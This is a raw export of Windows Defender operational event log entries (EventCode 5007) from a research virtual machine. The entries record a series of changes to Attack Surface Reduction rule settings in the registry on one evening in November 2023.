Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=541 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=540 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=539 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=538 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=537 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=536 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=535 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=534 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=533 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=532 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=531 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=530 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=529 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=528 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=527 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=526 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=525 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=524 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2

11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=523 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2

11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=522 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2

11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=521 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2

11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=520 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2

11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=519 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2

11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=518 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2

11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=517 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2

11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=516 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2

11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=515 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2

11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=514 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2

11/14/2023 10:17:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=513 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2 New value:

11/14/2023 10:17:43 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=512 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2

11/14/2023 10:17:43 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=511 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2

11/14/2023 10:12:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=510 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2 New value:

11/14/2023 10:12:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=509 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6

11/14/2023 10:08:58 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=508 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2 New value:

11/14/2023 10:08:58 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=507 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2

11/14/2023 10:07:53 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=506 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2 New value:

11/14/2023 10:07:53 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=505 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2

11/14/2023 09:57:38 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=502 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 New value:

11/14/2023 09:57:38 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=501 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2

11/14/2023 09:44:45 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=500 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0 New value:

11/14/2023 09:44:45 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=499 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1

11/14/2023 09:44:31 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=498 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0 New value:

11/14/2023 09:44:31 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=497 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0

11/14/2023 09:44:31 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=496 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0

11/14/2023 09:41:42 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=495 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1

11/14/2023 09:38:30 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=494 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1 New value:

